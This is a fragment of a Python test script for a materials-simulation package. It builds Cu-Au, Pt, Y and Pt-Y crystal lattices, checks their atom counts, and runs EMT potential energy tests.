atoms = L1_2(directions=[[1,0,0],[0,1,0],[0,0,1]], size=(15,15,15),
symbol=("Cu", "Au"), latticeconstant=3.95, pbc=(1,0,1),
debug=0)
ReportTest("Number of alloy atoms", len(atoms), 13500, 0)
nCu = sum(equal(atoms.get_atomic_numbers(), 29))
nAu = sum(equal(atoms.get_atomic_numbers(), 79))
ReportTest("Number of Cu atoms in alloy", nCu, 13500/4, 0)
ReportTest("Number of Au atoms in alloy", nAu, 3*13500/4, 0)
atoms.set_calculator(EMT())
dotest(atoms, 50, 0.06, "EMT_CuAu3")
atoms = FaceCenteredCubic(directions=[[1,0,0],[0,1,0],[0,0,1]], size=(15,15,15),
symbol="Pt", pbc=(1,0,1), debug=0)
ReportTest("Number of Pt atoms", len(atoms), 13500, 0)
atoms.set_calculator(EMT2013(PtY_parameters))
dotest(atoms, 50, 0.1, "EMT2013_Pt")
atoms = FaceCenteredCubic(directions=[[1,0,0],[0,1,0],[0,0,1]], size=(15,15,15),
symbol="Y", latticeconstant=4.97,
pbc=(1,0,1), debug=0)
ReportTest("Number of Y atoms", len(atoms), 13500, 0)
atoms.set_calculator(EMT2013(PtY_parameters))
dotest(atoms, 50, 0.1, "EMT2013_Y")
atoms = L1_2(directions=[[1,0,0],[0,1,0],[0,0,1]], size=(15,15,15),
symbol=("Y", "Pt"), latticeconstant=4.06, pbc=(1,0,1),
debug=0)
ReportTest("Number of alloy atoms", len(atoms), 13500, 0)
nY = sum(equal(atoms.get_atomic_numbers(), 39))
nPt = sum(equal(atoms.get_atomic_numbers(), 78))
ReportTest("Number of Cu atoms in alloy", nY, 13500/4, 0)
ReportTest("Number of Au atoms in alloy", nPt, 3*13500/4, 0)
atoms.set_calculator(EMT2013(PtY_parameters))
dotest(atoms, 50, 0.06, "EMT2013_Pt3Y")
if firsttime:
# Create the "main" routine in the results module.
print >> out, 'if __name__ == "__main__":'
print >> out, ' print "This is not a test, but a module containing test results"'
out.close()
ReportTest.Summary()
|
python
|